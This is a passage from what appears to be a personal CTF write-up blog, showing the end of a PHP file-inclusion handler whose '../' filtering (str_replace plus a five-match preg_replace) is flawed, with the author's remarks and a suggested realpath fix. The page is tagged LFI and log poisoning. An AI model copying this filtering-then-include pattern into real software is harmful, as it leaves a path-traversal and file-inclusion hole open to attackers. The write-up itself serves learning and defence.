    <span class="nv">$file</span> <span class="o">=</span> <span class="nb">str_replace</span><span class="p">(</span><span class="s1">&#39;../&#39;</span><span class="p">,</span> <span class="s1">&#39;&#39;</span><span class="p">,</span> <span class="nv">$file</span><span class="p">);</span>

    <span class="nv">$file</span> <span class="o">=</span> <span class="nb">preg_replace</span><span class="p">(</span><span class="s1">&#39;/\.\.\//&#39;</span><span class="p">,</span> <span class="s1">&#39;&#39;</span><span class="p">,</span> <span class="nv">$file</span><span class="p">,</span> <span class="mi">5</span><span class="p">);</span>
    <span class="nv">$filePath</span> <span class="o">=</span> <span class="s1">&#39;uploads/&#39;</span> <span class="o">.</span> <span class="nv">$file</span><span class="p">;</span>

    <span class="k">if</span> <span class="p">(</span><span class="nb">strpos</span><span class="p">(</span><span class="nv">$filePath</span><span class="p">,</span> <span class="s1">&#39;uploads/&#39;</span><span class="p">)</span> <span class="o">===</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
        <span class="o">@</span><span class="k">include</span><span class="p">(</span><span class="nv">$filePath</span><span class="p">);</span>
    <span class="p">}</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
    <span class="k">echo</span> <span class="s2">&quot;No data received.&quot;</span><span class="p">;</span>
<span class="p">}</span>
<span class="cp">?&gt;</span>
</code></pre></div>
<p>So the code is stripping out <code>../</code> sequences, but it's using the <code>preg_replace</code> function to strip out the first five occurrences of <code>../</code>. </p>
<p>One potential option to prevent the path traversal might be to use the <code>realpath</code> PHP function which returns the canonicalized absolute path. I am not a PHP developer though, so if there are better solutions to prevent this, I'd love to hear about them. </p>
<hr />
<h2 id="resources">Resources<a class="headerlink" href="#resources" title="Permanent link">&para;</a></h2>
<p><a href="https://www.php.net/manual/en/function.preg-replace.php">preg-replace</a>  </p>
<p><a href="https://www.php.net/manual/en/function.strpos.php">strpos</a></p>
<p><a href="https://www.php.net/manual/en/function.realpath.php">realpath</a></p>
  
  <!-- Source file information -->
  
  
  <!-- Was this page helpful? -->
  
  


  


  <form class="md-feedback" name="feedback" hidden>
    <fieldset>
      <legend class="md-feedback__title">
        Was this page helpful?
      </legend>
      <div class="md-feedback__inner">
        <div class="md-feedback__list">
          
            <button class="md-feedback__icon md-icon" type="submit" title="This page was helpful" data-md-value="1">
              <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M5 9v12H1V9zm4 12a2 2 0 0 1-2-2V9c0-.55.22-1.05.59-1.41L14.17 1l1.06 1.06c.27.27.44.64.44 1.05l-.03.32L14.69 8H21a2 2 0 0 1 2 2v2c0 .26-.05.5-.14.73l-3.02 7.05C19.54 20.5 18.83 21 18 21zm0-2h9.03L21 12v-2h-8.79l1.13-5.32L9 9.03z"/></svg>
            </button>
          
            <button class="md-feedback__icon md-icon" type="submit" title="This page could be improved" data-md-value="0">
              <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M19 15V3h4v12zM15 3a2 2 0 0 1 2 2v10c0 .55-.22 1.05-.59 1.41L9.83 23l-1.06-1.06c-.27-.27-.44-.64-.44-1.06l.03-.31.95-4.57H3a2 2 0 0 1-2-2v-2c0-.26.05-.5.14-.73l3.02-7.05C4.46 3.5 5.17 3 6 3zm0 2H5.97L3 12v2h8.78l-1.13 5.32L15 14.97z"/></svg>
            </button>
          
        </div>
        <div class="md-feedback__note">
          
            <div data-md-value="1" hidden>
              
              
                
              
              
              
                
                
              
              Thanks for your feedback!
            </div>
          
            <div data-md-value="0" hidden>
              
              
                
              
              
              
                
                
              
              Thanks for your feedback! Help us improve this page by using our <a href="..." target="_blank" rel="noopener">feedback form</a>.
            </div>
          
        </div>
      </div>
    </fieldset>
  </form>

  
  <!-- Tags -->
  
    
  


  <nav class="md-tags" >
    
      
      
      
        <span class="md-tag">LFI</span>
      
    
      
      
      
        <span class="md-tag">SSRF</span>
      
    
      
      
      
        <span class="md-tag">log_poisoning</span>
      
    
  </nav>

  
  
  <!-- Actions -->
  
  
  

  
  <!--
    Hack: check whether the content contains a h1 headline. If it doesn't, the
    page title (or respectively site name) is used as the main headline.
    Checking for the needle `<h1` is not perfect, but it should be good enough
    for now. Also note that we can't use `toc_tokens` as an indicator, since
    the `toc` extension might be absent.
  -->
  
  
  
  <!-- Navigation -->
  
    <nav class="md-footer__inner md-grid" aria-label="Footer" >

      <!-- Link to previous page -->
      
        <a
          href="tryhackme-kenobi.html"
          class="md-footer__link md-footer__link--prev"
          aria-label="Previous: TryHackMe: Kenobi"
        >
          <div class="md-footer__button md-icon">
            <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M20 11v2H8l5.5 5.5-1.42 1.42L4.16 12l7.92-7.92L13.5 5.5 8 11z"/></svg>
          </div>
          <div class="md-footer__title">
            <span class="md-footer__direction">
              Previous
            </span>
            <div class="md-ellipsis">
              TryHackMe: Kenobi
            </div>
          </div>
        </a>
      

      <!-- Link to next page -->
      
        <a
          href="../22/vulnlab-breach.html"
          class="md-footer__link md-footer__link--next"
          aria-label="Next: VulnLab: Breach"
        >
          <div class="md-footer__title">
            <span class="md-footer__direction">
              Next
            </span>
            <div class="md-ellipsis">
              VulnLab: Breach
            </div>
          </div>
          <div class="md-footer__button md-icon">
            <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M4 11v2h12l-5.5 5.5 1.42 1.42L19.84 12l-7.92-7.92L10.5 5.5 16 11z"/></svg>
          </div>
        </a>
      
    </nav>
  
  
  <!-- Comments -->
  
  <h2 id="__comments">Comments</h2>
  <!-- Insert generated snippet here -->
  <script src="https://giscus.app/client.js"
        data-repo="tomfieber/tomfieber.github.io"
        data-repo-id="R_kgDOPTkbBA"
        data-category="General"
        data-category-id="DIC_kwDOPTkbBM4Ctdzl"
        data-mapping="pathname"
        data-strict="0"
        data-reactions-enabled="1"
        data-emit-metadata="0"
        data-input-position="top"
        data-theme="preferred_color_scheme"
        data-lang="en"
        crossorigin="anonymous"
        async>
</script>

  <!-- Synchronize Giscus theme with palette -->
  <script>
    var giscus = document.querySelector("script[src*=giscus]")

    // Set palette on initial load
    var palette = __md_get("__palette")
    if (palette && typeof palette.color === "object") {
      var theme = palette.color.scheme === "slate"
        ? "transparent_dark"
        : "light"

      // Instruct Giscus to set theme
      giscus.setAttribute("data-theme", theme) 
    }

    // Register event handlers after documented loaded
    document.addEventListener("DOMContentLoaded", function() {
      var ref = document.querySelector("[data-md-component=palette]")
      ref.addEventListener("change", function() {
        var palette = __md_get("__palette")
        if (palette && typeof palette.color === "object") {
          var theme = palette.color.scheme === "slate"
            ? "transparent_dark"
            : "light"

          // Instruct Giscus to change theme
          var frame = document.querySelector(".giscus-frame")
          frame.contentWindow.postMessage(
            { giscus: { setConfig: { theme } } },
            "https://giscus.app"
          )
        }
      })
    })
  </script>

</article>
      
    </article>
  </div>

          
<script>var target=document.getElementById(location.hash.slice(1));target&&target.name&&(target.checked=target.name.startsWith("__tabbed_"))</script>
        </div>
        
          <button type="button" class="md-top md-icon" data-md-component="top" hidden>
  
  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M13 20h-2V8l-5.5 5.5-1.42-1.42L12 4.16l7.92 7.92-1.42 1.42L13 8z"/></svg>
  Back to top
</button>
        
      </main>
      
        <footer class="md-footer">
  
    
      
        
      
      <nav class="md-footer__inner md-grid" aria-label="Footer" >
        
          
          <a href="tryhackme-kenobi.html" class="md-footer__link md-footer__link--prev" aria-label="Previous: TryHackMe: Kenobi">
            <div class="md-footer__button md-icon">
              
              <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M20 11v2H8l5.5 5.5-1.42 1.42L4.16 12l7.92-7.92L13.5 5.5 8 11z"/></svg>
            </div>
            <div class="md-footer__title">
              <span class="md-footer__direction">
                Previous
              </span>
              <div class="md-ellipsis">
                TryHackMe: Kenobi
              </div>
            </div>
          </a>
        
        
          
          <a href="../22/vulnlab-breach.html" class="md-footer__link md-footer__link--next" aria-label="Next: VulnLab: Breach">
            <div class="md-footer__title">
              <span class="md-footer__direction">
                Next
              </span>
              <div class="md-ellipsis">
                VulnLab: Breach
              </div>
            </div>
            <div class="md-footer__button md-icon">
              
              <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M4 11v2h12l-5.5 5.5 1.42 1.42L19.84 12l-7.92-7.92L10.5 5.5 16 11z"/></svg>
            </div>
          </a>
        
      </nav>
    
  
  <div class="md-footer-meta md-typeset">
    <div class="md-footer-meta__inner md-grid">
      <div class="md-copyright">
  
    <div class="md-copyright__highlight">
      Copyright © 2025 Tom Fieber
    </div>
  
  
    Made with
    <a href="https://squidfunk.github.io/mkdocs-material/" target="_blank" rel="noopener">
      Material for MkDocs
    </a>
  
</div>
      
        <div class="md-social">
  
    
    
    
    
      
      
    
    <a href="https://x.com/tomfieber" target="_blank" rel="noopener" title="x.com" class="md-social__link">
      <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 448 512"><!--! Font Awesome Free 7.0.0 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2025 Fonticons, Inc.--><path fill="currentColor" d="M357.2 48h70.6L273.6 224.2 455 464H313L201.7 318.6 74.5 464H3.8l164.9-188.5L-5.2 48h145.6l100.5 132.9zm-24.8 373.8h39.1L119.1 88h-42z"/></svg>
    </a>
  
    
    
    
    
      
      
    
    <a href="https://github.com/tomfieber" target="_blank" rel="noopener" title="github.com" class="md-social__link">
      <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512"><!--! Font Awesome Free 7.0.0 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2025 Fonticons, Inc.--><path fill="currentColor" d="M173.9 397.4c0 2-2.3 3.6-5.2 3.6-3.3.3-5.6-1.3-5.6-3.6 0-2 2.3-3.6 5.2-3.6 3-.3 5.6 1.3 5.6 3.6m-31.1-4.5c-.7 2 1.3 4.3 4.3 4.9 2.6 1 5.6 0 6.2-2s-1.3-4.3-4.3-5.2c-2.6-.7-5.5.3-6.2 2.3m44.2-1.7c-2.9.7-4.9 2.6-4.6 4.9.3 2 2.9 3.3 5.9 2.6 2.9-.7 4.9-2.6 4.6-4.6-.3-1.9-3-3.2-5.9-2.9M252.8 8C114.1 8 8 113.3 8 252c0 110.9 69.8 205.8 169.5 239.2 12.8 2.3 17.3-5.6 17.3-12.1 0-6.2-.3-40.4-.3-61.4 0 0-70 15-84.7-29.8 0 0-11.4-29.1-27.8-36.6 0 0-22.9-15.7 1.6-15.4 0 0 24.9 2 38.6 25.8 21.9 38.6 58.6 27.5 72.9 20.9 2.3-16 8.8-27.1 16-33.7-55.9-6.2-112.3-14.3-112.3-110.5 0-27.5 7.6-41.3 23.6-58.9-2.6-6.5-11.1-33.3 2.6-67.9 20.9-6.5 69 27 69 27 20-5.6 41.5-8.5 62.8-8.5s42.8 2.9 62.8 8.5c0 0 48.1-33.6 69-27 13.7 34.7 5.2 61.4 2.6 67.9 16 17.7 25.8 31.5 25.8 58.9 0 96.5-58.9 104.2-114.8 110.5 9.2 7.9 17 22.9 17 46.4 0 33.7-.3 75.4-.3 83.6 0 6.5 4.6 14.4 17.3 12.1C436.2 457.8 504 362.9 504 252 504 113.3 391.5 8 252.8 8M105.2 352.9c-1.3 1-1 3.3.7 5.2 1.6 1.6 3.9 2.3 5.2 1 1.3-1 1-3.3-.7-5.2-1.6-1.6-3.9-2.3-5.2-1m-10.8-8.1c-.7 1.3.3 2.9 2.3 3.9 1.6 1 3.6.7 4.3-.7.7-1.3-.3-2.9-2.3-3.9-2-.6-3.6-.3-4.3.7m32.4 35.6c-1.6 1.3-1 4.3 1.3 6.2 2.3 2.3 5.2 2.6 6.5 1 1.3-1.3.7-4.3-1.3-6.2-2.2-2.3-5.2-2.6-6.5-1m-11.4-14.7c-1.6 1-1.6 3.6 0 5.9s4.3 3.3 5.6 2.3c1.6-1.3 1.6-3.9 0-6.2-1.4-2.3-4-3.3-5.6-2"/></svg>
    </a>
  
    
    
    
    
      
      
    
    <a href="https://www.linkedin.com/in/thomasfieber" target="_blank" rel="noopener" title="www.linkedin.com" class="md-social__link">
      <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 448 512"><!--! Font Awesome Free 7.0.0 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2025 Fonticons, Inc.--><path fill="currentColor" d="M416 32H31.9C14.3 32 0 46.5 0 64.3v383.4C0 465.5 14.3 480 31.9 480H416c17.6 0 32-14.5 32-32.3V64.3c0-17.8-14.4-32.3-32-32.3M135.4 416H69V202.2h66.5V416zM102.2 96a38.5 38.5 0 1 1 0 77 38.5 38.5 0 1 1 0-77m282.1 320h-66.4V312c0-24.8-.5-56.7-34.5-56.7-34.6 0-39.9 27-39.9 54.9V416h-66.4V202.2h63.7v29.2h.9c8.9-16.8 30.6-34.5 62.9-34.5 67.2 0 79.7 44.3 79.7 101.9z"/></svg>
    </a>
  
    
    
    
    
      
      
    
    <a href="https://discord.gg/XvAFFw6A" target="_blank" rel="noopener" title="discord.gg" class="md-social__link">
      <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 576 512"><!--! Font Awesome Free 7.0.0 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2025 Fonticons, Inc.--><path fill="currentColor" d="M492.5 69.8c-.2-.3-.4-.6-.8-.7-38.1-17.5-78.4-30-119.7-37.1-.4-.1-.8 0-1.1.1s-.6.4-.8.8c-5.5 9.9-10.5 20.2-14.9 30.6-44.6-6.8-89.9-6.8-134.4 0-4.5-10.5-9.5-20.7-15.1-30.6-.2-.3-.5-.6-.8-.8s-.7-.2-1.1-.2C162.5 39 122.2 51.5 84.1 69c-.3.1-.6.4-.8.7C7.1 183.5-13.8 294.6-3.6 404.2c0 .3.1.5.2.8s.3.4.5.6c44.4 32.9 94 58 146.8 74.2.4.1.8.1 1.1 0s.7-.4.9-.7c11.3-15.4 21.4-31.8 30-48.8.1-.2.2-.5.2-.8s0-.5-.1-.8-.2-.5-.4-.6-.4-.3-.7-.4c-15.8-6.1-31.2-13.4-45.9-21.9-.3-.2-.5-.4-.7-.6s-.3-.6-.3-.9 0-.6.2-.9.3-.5.6-.7c3.1-2.3 6.2-4.7 9.1-7.1.3-.2.6-.4.9-.4s.7 0 1 .1c96.2 43.9 200.4 43.9 295.5 0 .3-.1.7-.2 1-.2s.7.2.9.4c2.9 2.4 6 4.9 9.1 7.2.2.2.4.4.6.7s.2.6.2.9-.1.6-.3.9-.4.5-.6.6c-14.7 8.6-30 15.9-45.9 21.8-.2.1-.5.2-.7.4s-.3.4-.4.7-.1.5-.1.8.1.5.2.8c8.8 17 18.8 33.3 30 48.8.2.3.6.6.9.7s.8.1 1.1 0c52.9-16.2 102.6-41.3 147.1-74.2.2-.2.4-.4.5-.6s.2-.5.2-.8c12.3-126.8-20.5-236.9-86.9-334.5zm-302 267.7c-29 0-52.8-26.6-52.8-59.2s23.4-59.2 52.8-59.2c29.7 0 53.3 26.8 52.8 59.2 0 32.7-23.4 59.2-52.8 59.2m195.4 0c-29 0-52.8-26.6-52.8-59.2s23.4-59.2 52.8-59.2c29.7 0 53.3 26.8 52.8 59.2 0 32.7-23.2 59.2-52.8 59.2"/></svg>
    </a>
  
</div>
      
    </div>
  </div>
</footer>
      
    </div>
    <div class="md-dialog" data-md-component="dialog">
      <div class="md-dialog__inner md-typeset"></div>
    </div>
    
    
    
      
      <script id="__config" type="application/json">{"base": "../../../..", "features": ["navigation.instant", "navigation.tabs", "navigation.tabs.sticky", "navigation.indexes", "navigation.top", "search.suggestions", "search.highlight", "navigation.footer", "content.code.copy", "content.code.annotate", "content.code.tabs"], "search": "../../../../assets/javascripts/workers/search.d50fe291.min.js", "tags": null, "translations": {"clipboard.copied": "Copied to clipboard", "clipboard.copy": "Copy to clipboard", "search.result.more.one": "1 more on this page", "search.result.more.other": "# more on this page", "search.result.none": "No matching documents", "search.result.one": "1 matching document", "search.result.other": "# matching documents", "search.result.placeholder": "Type to start searching", "search.result.term.missing": "Missing", "select.version": "Select version"}, "version": null}</script>
    
    
      <script src="../../../../assets/javascripts/bundle.50899def.min.js"></script>
      
        <script src="https://unpkg.com/tablesort@5.3.0/dist/tablesort.min.js"></script>
      
        <script src="../../../../javascripts/tablesort.js"></script>
      
        <script src="../../../../javascripts/extra.js"></script>
      
    
  <script id="init-glightbox">const lightbox = GLightbox({"touchNavigation": true, "loop": false, "zoomable": true, "draggable": true, "openEffect": "zoom", "closeEffect": "zoom", "slideEffect": "slide"});
document$.subscribe(() => { lightbox.reload() });
</script></body>
</html>